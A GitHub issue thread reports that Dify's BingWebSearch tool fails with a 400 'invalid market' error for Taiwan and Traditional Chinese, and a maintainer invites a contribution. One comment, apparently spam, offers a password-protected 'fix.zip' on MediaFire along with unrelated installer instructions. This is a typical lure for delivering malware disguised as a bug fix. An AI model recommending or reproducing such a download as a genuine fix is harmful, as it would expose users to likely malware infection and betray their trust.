### ISSUE TITLE
BingWebSearch can't use other Market and Language

### ISSUE THREAD

**Issue by LeoHsu0802** [langgenius/dify#7642]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.6.16

### Cloud or Self Hosted

Cloud

### Steps to reproduce

![image](https://github.com/user-attachments/assets/ed5900ed-ef43-4a11-99bd-77dd42e84d47)

Use BingWebSearch and choose market Taiwan, Langu: Chinese(Traditional)

### ✔️ Expected Behavior

Expect return search result correctly

### ❌ Actual Behavior

Run failed: Node BingWebSearch run failed: Failed to invoke tool: Error 400: {"_type": "ErrorResponse", "errors": [{"_type": "Error", "code": "InvalidRequest", "subCode": "ParameterInvalidValue", "message": "Parameter has invalid value.", "moreDetails":"Entity Search is not allowed for this market.", "parameter": "mkt", "value": "zh-hant-TW" }]}

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by crazywoola** [comment]
Feel free to contribute to this feature, I think you could add more areas in this file.
